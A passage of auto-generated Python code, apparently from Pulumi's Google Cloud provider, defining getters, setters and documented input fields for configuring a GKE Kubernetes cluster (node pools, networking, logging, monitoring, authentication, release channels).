def enable_shielded_nodes(self) -> Optional[pulumi.Input[bool]]:
"""
Enable Shielded Nodes features on all nodes in this cluster. Defaults to `true`.
"""
return pulumi.get(self, "enable_shielded_nodes")
@enable_shielded_nodes.setter
def enable_shielded_nodes(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_shielded_nodes", value)
@property
@pulumi.getter(name="enableTpu")
def enable_tpu(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to enable Cloud TPU resources in this cluster.
See the [official documentation](https://cloud.google.com/tpu/docs/kubernetes-engine-setup).
"""
return pulumi.get(self, "enable_tpu")
@enable_tpu.setter
def enable_tpu(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_tpu", value)
@property
@pulumi.getter(name="identityServiceConfig")
def identity_service_config(self) -> Optional[pulumi.Input['ClusterIdentityServiceConfigArgs']]:
"""
. Structure is documented below.
"""
return pulumi.get(self, "identity_service_config")
@identity_service_config.setter
def identity_service_config(self, value: Optional[pulumi.Input['ClusterIdentityServiceConfigArgs']]):
pulumi.set(self, "identity_service_config", value)
@property
@pulumi.getter(name="initialNodeCount")
def initial_node_count(self) -> Optional[pulumi.Input[int]]:
"""
The number of nodes to create in this
cluster's default node pool. In regional or multi-zonal clusters, this is the
number of nodes per zone. Must be set if `node_pool` is not set. If you're using
`container.NodePool` objects with no default node pool, you'll need to
set this to a value of at least `1`, alongside setting
`remove_default_node_pool` to `true`.
"""
return pulumi.get(self, "initial_node_count")
@initial_node_count.setter
def initial_node_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "initial_node_count", value)
@property
@pulumi.getter(name="ipAllocationPolicy")
def ip_allocation_policy(self) -> Optional[pulumi.Input['ClusterIpAllocationPolicyArgs']]:
"""
Configuration of cluster IP allocation for
VPC-native clusters. Adding this block enables [IP aliasing](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-aliases),
making the cluster VPC-native instead of routes-based. Structure is documented
below.
"""
return pulumi.get(self, "ip_allocation_policy")
@ip_allocation_policy.setter
def ip_allocation_policy(self, value: Optional[pulumi.Input['ClusterIpAllocationPolicyArgs']]):
pulumi.set(self, "ip_allocation_policy", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The location (region or zone) in which the cluster
master will be created, as well as the default node location. If you specify a
zone (such as `us-central1-a`), the cluster will be a zonal cluster with a
single cluster master. If you specify a region (such as `us-west1`), the
cluster will be a regional cluster with multiple masters spread across zones in
the region, and with default node locations in those zones as well
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="loggingConfig")
def logging_config(self) -> Optional[pulumi.Input['ClusterLoggingConfigArgs']]:
"""
Logging configuration for the cluster.
Structure is documented below.
"""
return pulumi.get(self, "logging_config")
@logging_config.setter
def logging_config(self, value: Optional[pulumi.Input['ClusterLoggingConfigArgs']]):
pulumi.set(self, "logging_config", value)
@property
@pulumi.getter(name="loggingService")
def logging_service(self) -> Optional[pulumi.Input[str]]:
"""
The logging service that the cluster should
write logs to. Available options include `logging.googleapis.com`(Legacy Stackdriver),
`logging.googleapis.com/kubernetes`(Stackdriver Kubernetes Engine Logging), and `none`. Defaults to `logging.googleapis.com/kubernetes`
"""
return pulumi.get(self, "logging_service")
@logging_service.setter
def logging_service(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "logging_service", value)
@property
@pulumi.getter(name="maintenancePolicy")
def maintenance_policy(self) -> Optional[pulumi.Input['ClusterMaintenancePolicyArgs']]:
"""
The maintenance policy to use for the cluster. Structure is
documented below.
"""
return pulumi.get(self, "maintenance_policy")
@maintenance_policy.setter
def maintenance_policy(self, value: Optional[pulumi.Input['ClusterMaintenancePolicyArgs']]):
pulumi.set(self, "maintenance_policy", value)
@property
@pulumi.getter(name="masterAuth")
def master_auth(self) -> Optional[pulumi.Input['ClusterMasterAuthArgs']]:
"""
The authentication information for accessing the
Kubernetes master. Some values in this block are only returned by the API if
your service account has permission to get credentials for your GKE cluster. If
you see an unexpected diff unsetting your client cert, ensure you have the
`container.clusters.getCredentials` permission.
Structure is documented below.
"""
return pulumi.get(self, "master_auth")
@master_auth.setter
def master_auth(self, value: Optional[pulumi.Input['ClusterMasterAuthArgs']]):
pulumi.set(self, "master_auth", value)
@property
@pulumi.getter(name="masterAuthorizedNetworksConfig")
def master_authorized_networks_config(self) -> Optional[pulumi.Input['ClusterMasterAuthorizedNetworksConfigArgs']]:
"""
The desired
configuration options for master authorized networks. Omit the
nested `cidr_blocks` attribute to disallow external access (except
the cluster node IPs, which GKE automatically whitelists).
Structure is documented below.
"""
return pulumi.get(self, "master_authorized_networks_config")
@master_authorized_networks_config.setter
def master_authorized_networks_config(self, value: Optional[pulumi.Input['ClusterMasterAuthorizedNetworksConfigArgs']]):
pulumi.set(self, "master_authorized_networks_config", value)
@property
@pulumi.getter(name="minMasterVersion")
def min_master_version(self) -> Optional[pulumi.Input[str]]:
"""
The minimum version of the master. GKE
will auto-update the master to new versions, so this does not guarantee the
current master version--use the read-only `master_version` field to obtain that.
If unset, the cluster's version will be set by GKE to the version of the most recent
official release (which is not necessarily the latest version). Most users will find
the `container.get_engine_versions` data source useful - it indicates which versions
are available. If you intend to specify versions manually,
[the docs](https://cloud.google.com/kubernetes-engine/versioning-and-upgrades#specifying_cluster_version)
describe the various acceptable formats for this field.
"""
return pulumi.get(self, "min_master_version")
@min_master_version.setter
def min_master_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "min_master_version", value)
@property
@pulumi.getter(name="monitoringConfig")
def monitoring_config(self) -> Optional[pulumi.Input['ClusterMonitoringConfigArgs']]:
"""
Monitoring configuration for the cluster.
Structure is documented below.
"""
return pulumi.get(self, "monitoring_config")
@monitoring_config.setter
def monitoring_config(self, value: Optional[pulumi.Input['ClusterMonitoringConfigArgs']]):
pulumi.set(self, "monitoring_config", value)
@property
@pulumi.getter(name="monitoringService")
def monitoring_service(self) -> Optional[pulumi.Input[str]]:
"""
The monitoring service that the cluster
should write metrics to.
Automatically send metrics from pods in the cluster to the Google Cloud Monitoring API.
VM metrics will be collected by Google Compute Engine regardless of this setting
Available options include
`monitoring.googleapis.com`(Legacy Stackdriver), `monitoring.googleapis.com/kubernetes`(Stackdriver Kubernetes Engine Monitoring), and `none`.
Defaults to `monitoring.googleapis.com/kubernetes`
"""
return pulumi.get(self, "monitoring_service")
@monitoring_service.setter
def monitoring_service(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "monitoring_service", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the cluster, unique within the project and
location.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def network(self) -> Optional[pulumi.Input[str]]:
"""
The name or self_link of the Google Compute Engine
network to which the cluster is connected. For Shared VPC, set this to the self link of the
shared network.
"""
return pulumi.get(self, "network")
@network.setter
def network(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "network", value)
@property
@pulumi.getter(name="networkPolicy")
def network_policy(self) -> Optional[pulumi.Input['ClusterNetworkPolicyArgs']]:
"""
Configuration options for the
[NetworkPolicy](https://kubernetes.io/docs/concepts/services-networking/networkpolicies/)
feature. Structure is documented below.
"""
return pulumi.get(self, "network_policy")
@network_policy.setter
def network_policy(self, value: Optional[pulumi.Input['ClusterNetworkPolicyArgs']]):
pulumi.set(self, "network_policy", value)
@property
@pulumi.getter(name="networkingMode")
def networking_mode(self) -> Optional[pulumi.Input[str]]:
"""
Determines whether alias IPs or routes will be used for pod IPs in the cluster.
Options are `VPC_NATIVE` or `ROUTES`. `VPC_NATIVE` enables [IP aliasing](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-aliases),
and requires the `ip_allocation_policy` block to be defined. By default when this field is unspecified, GKE will create a `ROUTES`-based cluster.
"""
return pulumi.get(self, "networking_mode")
@networking_mode.setter
def networking_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "networking_mode", value)
@property
@pulumi.getter(name="nodeConfig")
def node_config(self) -> Optional[pulumi.Input['ClusterNodeConfigArgs']]:
"""
Parameters used in creating the default node pool.
Generally, this field should not be used at the same time as a
`container.NodePool` or a `node_pool` block; this configuration
manages the default node pool, which isn't recommended to be used.
Structure is documented below.
"""
return pulumi.get(self, "node_config")
@node_config.setter
def node_config(self, value: Optional[pulumi.Input['ClusterNodeConfigArgs']]):
pulumi.set(self, "node_config", value)
@property
@pulumi.getter(name="nodeLocations")
def node_locations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The list of zones in which the cluster's nodes
are located. Nodes must be in the region of their regional cluster or in the
same region as their cluster's zone for zonal clusters. If this is specified for
a zonal cluster, omit the cluster's zone.
"""
return pulumi.get(self, "node_locations")
@node_locations.setter
def node_locations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "node_locations", value)
@property
@pulumi.getter(name="nodePools")
def node_pools(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ClusterNodePoolArgs']]]]:
"""
List of node pools associated with this cluster.
See container.NodePool for schema.
**Warning:** node pools defined inside a cluster can't be changed (or added/removed) after
cluster creation without deleting and recreating the entire cluster. Unless you absolutely need the ability
to say "these are the _only_ node pools associated with this cluster", use the
container.NodePool resource instead of this property.
"""
return pulumi.get(self, "node_pools")
@node_pools.setter
def node_pools(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ClusterNodePoolArgs']]]]):
pulumi.set(self, "node_pools", value)
@property
@pulumi.getter(name="nodeVersion")
def node_version(self) -> Optional[pulumi.Input[str]]:
"""
The Kubernetes version on the nodes. Must either be unset
or set to the same value as `min_master_version` on create. Defaults to the default
version set by GKE which is not necessarily the latest version. This only affects
nodes in the default node pool. While a fuzzy version can be specified, it's
recommended that you specify explicit versions as the provider will see spurious diffs
when fuzzy versions are used. See the `container.get_engine_versions` data source's
`version_prefix` field to approximate fuzzy versions.
To update nodes in other node pools, use the `version` attribute on the node pool.
"""
return pulumi.get(self, "node_version")
@node_version.setter
def node_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "node_version", value)
@property
@pulumi.getter(name="notificationConfig")
def notification_config(self) -> Optional[pulumi.Input['ClusterNotificationConfigArgs']]:
"""
Configuration for the [cluster upgrade notifications](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-upgrade-notifications) feature. Structure is documented below.
"""
return pulumi.get(self, "notification_config")
@notification_config.setter
def notification_config(self, value: Optional[pulumi.Input['ClusterNotificationConfigArgs']]):
pulumi.set(self, "notification_config", value)
@property
@pulumi.getter(name="podSecurityPolicyConfig")
def pod_security_policy_config(self) -> Optional[pulumi.Input['ClusterPodSecurityPolicyConfigArgs']]:
"""
) Configuration for the
[PodSecurityPolicy](https://cloud.google.com/kubernetes-engine/docs/how-to/pod-security-policies) feature.
Structure is documented below.
"""
return pulumi.get(self, "pod_security_policy_config")
@pod_security_policy_config.setter
def pod_security_policy_config(self, value: Optional[pulumi.Input['ClusterPodSecurityPolicyConfigArgs']]):
pulumi.set(self, "pod_security_policy_config", value)
@property
@pulumi.getter(name="privateClusterConfig")
def private_cluster_config(self) -> Optional[pulumi.Input['ClusterPrivateClusterConfigArgs']]:
"""
Configuration for [private clusters](https://cloud.google.com/kubernetes-engine/docs/how-to/private-clusters),
clusters with private nodes. Structure is documented below.
"""
return pulumi.get(self, "private_cluster_config")
@private_cluster_config.setter
def private_cluster_config(self, value: Optional[pulumi.Input['ClusterPrivateClusterConfigArgs']]):
pulumi.set(self, "private_cluster_config", value)
@property
@pulumi.getter(name="privateIpv6GoogleAccess")
def private_ipv6_google_access(self) -> Optional[pulumi.Input[str]]:
"""
The desired state of IPv6 connectivity to Google Services. By default, no private IPv6 access to or from Google Services (all access will be via IPv4).
"""
return pulumi.get(self, "private_ipv6_google_access")
@private_ipv6_google_access.setter
def private_ipv6_google_access(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_ipv6_google_access", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs. If it
is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter(name="releaseChannel")
def release_channel(self) -> Optional[pulumi.Input['ClusterReleaseChannelArgs']]:
"""
Configuration options for the [Release channel](https://cloud.google.com/kubernetes-engine/docs/concepts/release-channels)
feature, which provide more control over automatic upgrades of your GKE clusters.
When updating this field, GKE imposes specific version requirements. See
[Selecting a new release channel](https://cloud.google.com/kubernetes-engine/docs/concepts/release-channels#selecting_a_new_release_channel)
for more details; the `container.get_engine_versions` datasource can provide
the default version for a channel. Note that removing the `release_channel`
field from your config will cause the provider to stop managing your cluster's
release channel, but will not unenroll it. Instead, use the `"UNSPECIFIED"`
channel. Structure is documented below.
"""
return pulumi.get(self, "release_channel")
@release_channel.setter
def release_channel(self, value: Optional[pulumi.Input['ClusterReleaseChannelArgs']]):
pulumi.set(self, "release_channel", value)
@property
@pulumi.getter(name="removeDefaultNodePool")
def remove_default_node_pool(self) -> Optional[pulumi.Input[bool]]:
"""
If `true`, deletes the default node
pool upon cluster creation. If you're using `container.NodePool`
resources with no default node pool, this should be set to `true`, alongside
setting `initial_node_count` to at least `1`.
"""
return pulumi.get(self, "remove_default_node_pool")
@remove_default_node_pool.setter
def remove_default_node_pool(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "remove_default_node_pool", value)
@property
@pulumi.getter(name="resourceLabels")
def resource_labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
The GCE resource labels (a map of key/value pairs) to be applied to the cluster.
"""
return pulumi.get(self, "resource_labels")
@resource_labels.setter
def resource_labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "resource_labels", value)
@property
@pulumi.getter(name="resourceUsageExportConfig")
def resource_usage_export_config(self) -> Optional[pulumi.Input['ClusterResourceUsageExportConfigArgs']]:
"""
Configuration for the
[ResourceUsageExportConfig](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-usage-metering) feature.
Structure is documented below.
"""
return pulumi.get(self, "resource_usage_export_config")
@resource_usage_export_config.setter
def resource_usage_export_config(self, value: Optional[pulumi.Input['ClusterResourceUsageExportConfigArgs']]):
pulumi.set(self, "resource_usage_export_config", value)
@property
@pulumi.getter
def subnetwork(self) -> Optional[pulumi.Input[str]]:
"""
The name or self_link of the Google Compute Engine
subnetwork in which the cluster's instances are launched.
"""
return pulumi.get(self, "subnetwork")
@subnetwork.setter
def subnetwork(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnetwork", value)
@property
@pulumi.getter(name="verticalPodAutoscaling")
def vertical_pod_autoscaling(self) -> Optional[pulumi.Input['ClusterVerticalPodAutoscalingArgs']]:
"""
Vertical Pod Autoscaling automatically adjusts the resources of pods controlled by it.
Structure is documented below.
"""
return pulumi.get(self, "vertical_pod_autoscaling")
@vertical_pod_autoscaling.setter
def vertical_pod_autoscaling(self, value: Optional[pulumi.Input['ClusterVerticalPodAutoscalingArgs']]):
pulumi.set(self, "vertical_pod_autoscaling", value)
@property
@pulumi.getter(name="workloadIdentityConfig")
def workload_identity_config(self) -> Optional[pulumi.Input['ClusterWorkloadIdentityConfigArgs']]:
"""
Workload Identity allows Kubernetes service accounts to act as a user-managed
[Google IAM Service Account](https://cloud.google.com/iam/docs/service-accounts#user-managed_service_accounts).
Structure is documented below.
"""
return pulumi.get(self, "workload_identity_config")
@workload_identity_config.setter
def workload_identity_config(self, value: Optional[pulumi.Input['ClusterWorkloadIdentityConfigArgs']]):
pulumi.set(self, "workload_identity_config", value)
@pulumi.input_type
class _ClusterState:
def __init__(__self__, *,
addons_config: Optional[pulumi.Input['ClusterAddonsConfigArgs']] = None,
authenticator_groups_config: Optional[pulumi.Input['ClusterAuthenticatorGroupsConfigArgs']] = None,
cluster_autoscaling: Optional[pulumi.Input['ClusterClusterAutoscalingArgs']] = None,
cluster_ipv4_cidr: Optional[pulumi.Input[str]] = None,
cluster_telemetry: Optional[pulumi.Input['ClusterClusterTelemetryArgs']] = None,
confidential_nodes: Optional[pulumi.Input['ClusterConfidentialNodesArgs']] = None,
database_encryption: Optional[pulumi.Input['ClusterDatabaseEncryptionArgs']] = None,
datapath_provider: Optional[pulumi.Input[str]] = None,
default_max_pods_per_node: Optional[pulumi.Input[int]] = None,
default_snat_status: Optional[pulumi.Input['ClusterDefaultSnatStatusArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
dns_config: Optional[pulumi.Input['ClusterDnsConfigArgs']] = None,
enable_autopilot: Optional[pulumi.Input[bool]] = None,
enable_binary_authorization: Optional[pulumi.Input[bool]] = None,
enable_intranode_visibility: Optional[pulumi.Input[bool]] = None,
enable_kubernetes_alpha: Optional[pulumi.Input[bool]] = None,
enable_l4_ilb_subsetting: Optional[pulumi.Input[bool]] = None,
enable_legacy_abac: Optional[pulumi.Input[bool]] = None,
enable_shielded_nodes: Optional[pulumi.Input[bool]] = None,
enable_tpu: Optional[pulumi.Input[bool]] = None,
endpoint: Optional[pulumi.Input[str]] = None,
identity_service_config: Optional[pulumi.Input['ClusterIdentityServiceConfigArgs']] = None,
initial_node_count: Optional[pulumi.Input[int]] = None,
ip_allocation_policy: Optional[pulumi.Input['ClusterIpAllocationPolicyArgs']] = None,
label_fingerprint: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
logging_config: Optional[pulumi.Input['ClusterLoggingConfigArgs']] = None,
logging_service: Optional[pulumi.Input[str]] = None,
maintenance_policy: Optional[pulumi.Input['ClusterMaintenancePolicyArgs']] = None,
master_auth: Optional[pulumi.Input['ClusterMasterAuthArgs']] = None,
master_authorized_networks_config: Optional[pulumi.Input['ClusterMasterAuthorizedNetworksConfigArgs']] = None,
master_version: Optional[pulumi.Input[str]] = None,
min_master_version: Optional[pulumi.Input[str]] = None,
monitoring_config: Optional[pulumi.Input['ClusterMonitoringConfigArgs']] = None,
monitoring_service: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
network: Optional[pulumi.Input[str]] = None,
network_policy: Optional[pulumi.Input['ClusterNetworkPolicyArgs']] = None,
networking_mode: Optional[pulumi.Input[str]] = None,
node_config: Optional[pulumi.Input['ClusterNodeConfigArgs']] = None,
node_locations: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
node_pools: Optional[pulumi.Input[Sequence[pulumi.Input['ClusterNodePoolArgs']]]] = None,
node_version: Optional[pulumi.Input[str]] = None,
notification_config: Optional[pulumi.Input['ClusterNotificationConfigArgs']] = None,
operation: Optional[pulumi.Input[str]] = None,
pod_security_policy_config: Optional[pulumi.Input['ClusterPodSecurityPolicyConfigArgs']] = None,
private_cluster_config: Optional[pulumi.Input['ClusterPrivateClusterConfigArgs']] = None,
private_ipv6_google_access: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
release_channel: Optional[pulumi.Input['ClusterReleaseChannelArgs']] = None,
remove_default_node_pool: Optional[pulumi.Input[bool]] = None,
resource_labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
resource_usage_export_config: Optional[pulumi.Input['ClusterResourceUsageExportConfigArgs']] = None,
self_link: Optional[pulumi.Input[str]] = None,
services_ipv4_cidr: Optional[pulumi.Input[str]] = None,
subnetwork: Optional[pulumi.Input[str]] = None,
tpu_ipv4_cidr_block: Optional[pulumi.Input[str]] = None,
vertical_pod_autoscaling: Optional[pulumi.Input['ClusterVerticalPodAutoscalingArgs']] = None,
workload_identity_config: Optional[pulumi.Input['ClusterWorkloadIdentityConfigArgs']] = None):
"""
Input properties used for looking up and filtering Cluster resources.
:param pulumi.Input['ClusterAddonsConfigArgs'] addons_config: The configuration for addons supported by GKE.
Structure is documented below.
:param pulumi.Input['ClusterAuthenticatorGroupsConfigArgs'] authenticator_groups_config: Configuration for the
[Google Groups for GKE](https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control#groups-setup-gsuite) feature.
Structure is documented below.
:param pulumi.Input['ClusterClusterAutoscalingArgs'] cluster_autoscaling: Per-cluster configuration of Node Auto-Provisioning with Cluster Autoscaler to
automatically adjust the size of the cluster and create/delete node pools based
on the current needs of the cluster's workload. See the
[guide to using Node Auto-Provisioning](https://cloud.google.com/kubernetes-engine/docs/how-to/node-auto-provisioning)
for more details. Structure is documented below.
:param pulumi.Input[str] cluster_ipv4_cidr: The IP address range of the Kubernetes pods
in this cluster in CIDR notation (e.g. `10.96.0.0/14`). Leave blank to have one
automatically chosen or specify a `/14` block in `10.0.0.0/8`. This field will
only work for routes-based clusters, where `ip_allocation_policy` is not defined.
:param pulumi.Input['ClusterClusterTelemetryArgs'] cluster_telemetry: Configuration for
[ClusterTelemetry](https://cloud.google.com/monitoring/kubernetes-engine/installing#controlling_the_collection_of_application_logs) feature,
Structure is documented below.
:param pulumi.Input['ClusterConfidentialNodesArgs'] confidential_nodes: Configuration for [Confidential Nodes](https://cloud.google.com/kubernetes-engine/docs/how-to/confidential-gke-nodes) feature. Structure is documented below documented below.
:param pulumi.Input['ClusterDatabaseEncryptionArgs'] database_encryption: Structure is documented below.
:param pulumi.Input[str] datapath_provider: The desired datapath provider for this cluster. By default, uses the IPTables-based kube-proxy implementation.
:param pulumi.Input[int] default_max_pods_per_node: The default maximum number of pods
per node in this cluster. This doesn't work on "routes-based" clusters, clusters
that don't have IP Aliasing enabled. See the [official documentation](https://cloud.google.com/kubernetes-engine/docs/how-to/flexible-pod-cidr)
for more information.
:param pulumi.Input['ClusterDefaultSnatStatusArgs'] default_snat_status: [GKE SNAT](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-masquerade-agent#how_ipmasq_works) DefaultSnatStatus contains the desired state of whether default sNAT should be disabled on the cluster, [API doc](https://cloud.google.com/kubernetes-engine/docs/reference/rest/v1beta1/projects.locations.clusters#networkconfig). Structure is documented below
:param pulumi.Input[str] description: Description of the cluster.
:param pulumi.Input['ClusterDnsConfigArgs'] dns_config: Configuration for [Using Cloud DNS for GKE](https://cloud.google.com/kubernetes-engine/docs/how-to/cloud-dns). Structure is documented below.
:param pulumi.Input[bool] enable_autopilot: Enable Autopilot for this cluster. Defaults to `false`.
Note that when this option is enabled, certain features of Standard GKE are not available.
See the [official documentation](https://cloud.google.com/kubernetes-engine/docs/concepts/autopilot-overview#comparison)
for available features.
:param pulumi.Input[bool] enable_binary_authorization: Enable Binary Authorization for this cluster.
If enabled, all container images will be validated by Google Binary Authorization.
:param pulumi.Input[bool] enable_intranode_visibility: Whether Intra-node visibility is enabled for this cluster. This makes same node pod to pod traffic visible for VPC network.
:param pulumi.Input[bool] enable_kubernetes_alpha: Whether to enable Kubernetes Alpha features for
this cluster. Note that when this option is enabled, the cluster cannot be upgraded
and will be automatically deleted after 30 days.
:param pulumi.Input[bool] enable_l4_ilb_subsetting: Whether L4ILB Subsetting is enabled for this cluster.
:param pulumi.Input[bool] enable_legacy_abac: Whether the ABAC authorizer is enabled for this cluster.
When enabled, identities in the system, including service accounts, nodes, and controllers,
will have statically granted permissions beyond those provided by the RBAC configuration or IAM.
Defaults to `false`
:param pulumi.Input[bool] enable_shielded_nodes: Enable Shielded Nodes features on all nodes in this cluster. Defaults to `true`.
:param pulumi.Input[bool] enable_tpu: Whether to enable Cloud TPU resources in this cluster.
See the [official documentation](https://cloud.google.com/tpu/docs/kubernetes-engine-setup).
:param pulumi.Input[str] endpoint: The IP address of this cluster's Kubernetes master.
:param pulumi.Input['ClusterIdentityServiceConfigArgs'] identity_service_config: . Structure is documented below.
:param pulumi.Input[int] initial_node_count: The number of nodes to create in this
cluster's default node pool. In regional or multi-zonal clusters, this is the
number of nodes per zone. Must be set if `node_pool` is not set. If you're using
`container.NodePool` objects with no default node pool, you'll need to
set this to a value of at least `1`, alongside setting
`remove_default_node_pool` to `true`.
:param pulumi.Input['ClusterIpAllocationPolicyArgs'] ip_allocation_policy: Configuration of cluster IP allocation for
VPC-native clusters. Adding this block enables [IP aliasing](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-aliases),
making the cluster VPC-native instead of routes-based. Structure is documented
below.
:param pulumi.Input[str] label_fingerprint: The fingerprint of the set of labels for this cluster.
:param pulumi.Input[str] location: The location (region or zone) in which the cluster
master will be created, as well as the default node location. If you specify a
zone (such as `us-central1-a`), the cluster will be a zonal cluster with a
single cluster master. If you specify a region (such as `us-west1`), the
cluster will be a regional cluster with multiple masters spread across zones in
the region, and with default node locations in those zones as well
:param pulumi.Input['ClusterLoggingConfigArgs'] logging_config: Logging configuration for the cluster.
Structure is documented below.
:param pulumi.Input[str] logging_service: The logging service that the cluster should
write logs to. Available options include `logging.googleapis.com`(Legacy Stackdriver),
`logging.googleapis.com/kubernetes`(Stackdriver Kubernetes Engine Logging), and `none`. Defaults to `logging.googleapis.com/kubernetes`
:param pulumi.Input['ClusterMaintenancePolicyArgs'] maintenance_policy: The maintenance policy to use for the cluster. Structure is
documented below.
:param pulumi.Input['ClusterMasterAuthArgs'] master_auth: The authentication information for accessing the
Kubernetes master. Some values in this block are only returned by the API if
your service account has permission to get credentials for your GKE cluster. If
you see an unexpected diff unsetting your client cert, ensure you have the
`container.clusters.getCredentials` permission.
Structure is documented below.
:param pulumi.Input['ClusterMasterAuthorizedNetworksConfigArgs'] master_authorized_networks_config: The desired
configuration options for master authorized networks. Omit the
nested `cidr_blocks` attribute to disallow external access (except
the cluster node IPs, which GKE automatically whitelists).
Structure is documented below.
:param pulumi.Input[str] master_version: The current version of the master in the cluster. This may
be different than the `min_master_version` set in the config if the master
has been updated by GKE.
:param pulumi.Input[str] min_master_version: The minimum version of the master. GKE
will auto-update the master to new versions, so this does not guarantee the
current master version--use the read-only `master_version` field to obtain that.
If unset, the cluster's version will be set by GKE to the version of the most recent
official release (which is not necessarily the latest version). Most users will find
the `container.get_engine_versions` data source useful - it indicates which versions
are available. If you intend to specify versions manually,
[the docs](https://cloud.google.com/kubernetes-engine/versioning-and-upgrades#specifying_cluster_version)
describe the various acceptable formats for this field.
:param pulumi.Input['ClusterMonitoringConfigArgs'] monitoring_config: Monitoring configuration for the cluster.
Structure is documented below.
:param pulumi.Input[str] monitoring_service: The monitoring service that the cluster
should write metrics to.
Automatically send metrics from pods in the cluster to the Google Cloud Monitoring API.
VM metrics will be collected by Google Compute Engine regardless of this setting
Available options include
`monitoring.googleapis.com`(Legacy Stackdriver), `monitoring.googleapis.com/kubernetes`(Stackdriver Kubernetes Engine Monitoring), and `none`.
Defaults to `monitoring.googleapis.com/kubernetes`
:param pulumi.Input[str] name: The name of the cluster, unique within the project and
location.
:param pulumi.Input[str] network: The name or self_link of the Google Compute Engine
network to which the cluster is connected. For Shared VPC, set this to the self link of the
shared network.
:param pulumi.Input['ClusterNetworkPolicyArgs'] network_policy: Configuration options for the
[NetworkPolicy](https://kubernetes.io/docs/concepts/services-networking/networkpolicies/)
feature. Structure is documented below.
:param pulumi.Input[str] networking_mode: Determines whether alias IPs or routes will be used for pod IPs in the cluster.
Options are `VPC_NATIVE` or `ROUTES`. `VPC_NATIVE` enables [IP aliasing](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-aliases),
and requires the `ip_allocation_policy` block to be defined. By default when this field is unspecified, GKE will create a `ROUTES`-based cluster.
:param pulumi.Input['ClusterNodeConfigArgs'] node_config: Parameters used in creating the default node pool.
Generally, this field should not be used at the same time as a
`container.NodePool` or a `node_pool` block; this configuration
manages the default node pool, which isn't recommended to be used.
Structure is documented below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] node_locations: The list of zones in which the cluster's nodes
are located. Nodes must be in the region of their regional cluster or in the
same region as their cluster's zone for zonal clusters. If this is specified for
a zonal cluster, omit the cluster's zone.
:param pulumi.Input[Sequence[pulumi.Input['ClusterNodePoolArgs']]] node_pools: List of node pools associated with this cluster.
See container.NodePool for schema.
**Warning:** node pools defined inside a cluster can't be changed (or added/removed) after
cluster creation without deleting and recreating the entire cluster. Unless you absolutely need the ability
to say "these are the _only_ node pools associated with this cluster", use the
container.NodePool resource instead of this property.
:param pulumi.Input[str] node_version: The Kubernetes version on the nodes. Must either be unset
or set to the same value as `min_master_version` on create. Defaults to the default
version set by GKE which is not necessarily the latest version. This only affects
nodes in the default node pool. While a fuzzy version can be specified, it's
recommended that you specify explicit versions as the provider will see spurious diffs
when fuzzy versions are used. See the `container.get_engine_versions` data source's
`version_prefix` field to approximate fuzzy versions.
To update nodes in other node pools, use the `version` attribute on the node pool.
:param pulumi.Input['ClusterNotificationConfigArgs'] notification_config: Configuration for the [cluster upgrade notifications](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-upgrade-notifications) feature. Structure is documented below.
:param pulumi.Input['ClusterPodSecurityPolicyConfigArgs'] pod_security_policy_config: ) Configuration for the
[PodSecurityPolicy](https://cloud.google.com/kubernetes-engine/docs/how-to/pod-security-policies) feature.
Structure is documented below.
:param pulumi.Input['ClusterPrivateClusterConfigArgs'] private_cluster_config: Configuration for [private clusters](https://cloud.google.com/kubernetes-engine/docs/how-to/private-clusters),
clusters with private nodes. Structure is documented below.
:param pulumi.Input[str] private_ipv6_google_access: The desired state of IPv6 connectivity to Google Services. By default, no private IPv6 access to or from Google Services (all access will be via IPv4).
:param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it
is not provided, the provider project is used.
:param pulumi.Input['ClusterReleaseChannelArgs'] release_channel: Configuration options for the [Release channel](https://cloud.google.com/kubernetes-engine/docs/concepts/release-channels)
